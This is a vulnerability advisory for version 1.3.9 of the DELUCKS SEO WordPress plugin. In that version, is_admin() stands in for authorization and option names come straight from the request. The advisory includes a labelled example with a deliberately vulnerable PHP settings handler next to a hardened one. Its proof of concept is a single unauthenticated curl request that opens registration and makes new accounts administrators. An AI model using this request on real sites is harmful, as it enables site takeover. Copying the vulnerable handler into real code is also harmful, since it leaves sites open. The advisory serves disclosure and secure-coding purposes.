DELUCKS SEO [Unauthenticated Options Update]
Description
The DELUCKS SEO plugin performs no authorization checks when saving its options. On every request, during plugin initialization, it calls the is_admin() function to decide whether the request comes from a site administrator. is_admin() does not check authentication or capabilities at all: it returns true for any request to a URL under the wp-admin path, including unauthenticated ones. Whenever it returns true, the plugin calls the method DPC::saveSettings(), which performs no capability check, nonce check or other validation before writing the submitted values to the database.

In addition, the option names are taken dynamically from the POST request rather than from a fixed list of plugin settings, so anyone can send a specially crafted POST request to wp-admin and update arbitrary options, including WordPress core options.
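The following is an added example, not code from the DELUCKS SEO plugin: a hypothetical minimal WordPress settings handler that reproduces the pattern described above (is_admin() used as an authorization check, option names taken from the request) next to a hardened version with a capability check, a nonce check, an allowlist of option names and a namespaced option prefix. All function, hook and option names prefixed example_ are invented for illustration.

```php
<?php
// Added example, NOT the DELUCKS SEO plugin's own code. Names prefixed
// example_ are hypothetical. Requires the WordPress runtime (is_admin(),
// update_option(), current_user_can(), check_admin_referer(), ...).

// VULNERABLE pattern: is_admin() is treated as "the caller is an admin".
// It only means "this URL is under /wp-admin/", so an anonymous
// POST to wp-admin/index.php passes the check. Hooked on 'init', it runs
// before wp-admin's auth_redirect() can send the visitor to the login page.
function example_save_settings_vulnerable() {
    if ( ! is_admin() || empty( $_POST['example_save_settings'] ) ) {
        return;
    }
    // Both the option NAME and VALUE are attacker-controlled. Core options
    // such as users_can_register and default_role are ordinary rows in
    // wp_options, so they can be overwritten like any plugin setting.
    foreach ( (array) $_POST['example_settings'] as $name => $value ) {
        update_option( $name, $value );
    }
}
// add_action( 'init', 'example_save_settings_vulnerable' ); // do not register this

// HARDENED version of the same handler.
function example_save_settings_hardened() {
    if ( ! is_admin() || empty( $_POST['example_save_settings'] ) ) {
        return;
    }
    // 1. Authorization: is_admin() says nothing about the user; ask for the
    //    capability that actually governs changing site options.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions', '', array( 'response' => 403 ) );
    }
    // 2. CSRF: the submitting form must carry the nonce emitted by
    //    wp_nonce_field( 'example_save_settings' ); dies on mismatch.
    check_admin_referer( 'example_save_settings' );

    // 3. Allowlist: option name => sanitizer. Nothing outside this map is
    //    ever written, so request-supplied names cannot reach core options.
    $allowed = array(
        'title_separator'  => 'sanitize_text_field',
        'noindex_archives' => 'example_sanitize_bool',
    );
    $submitted = isset( $_POST['example_settings'] )
        ? (array) wp_unslash( $_POST['example_settings'] )
        : array();

    foreach ( $allowed as $name => $sanitizer ) {
        if ( ! array_key_exists( $name, $submitted ) ) {
            continue;
        }
        // 4. Namespaced key: even a careless addition to $allowed can only
        //    ever touch example_* rows, never users_can_register or default_role.
        update_option( 'example_' . $name, call_user_func( $sanitizer, $submitted[ $name ] ) );
    }
}
// 'admin_init' fires after wp-admin has already forced authentication, and the
// handler re-checks capability and nonce itself rather than relying on that.
add_action( 'admin_init', 'example_save_settings_hardened' );

function example_sanitize_bool( $value ) {
    return $value ? '1' : '0';
}
```

The allowlist and the fixed option prefix are what close the core-option angle used in the PoC below; the capability and nonce checks close the unauthenticated and cross-site angles respectively. Any one of the three on its own would have blocked the curl request in the PoC, but a plugin that writes options should have all of them.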
PoC
In this proof of concept we change two core options with a single unauthenticated POST to wp-admin: users_can_register, which opens user registration, and default_role, which makes every newly registered account an administrator.
curl 'http://sbwp1.dev/wp-admin/index.php' \
-d 'dpc_save_settings=1&dpc[realnames][users_can_register]=1&dpc[realnames][default_role]=administrator'
INFO
- Published: 12 May 2016
- Author: Pan Vag
- Vendor: delucks.com
- Plugin: DELUCKS SEO
- Version: 1.3.9
- Tested on: WordPress 4.5
- ID: DWF-2016-87037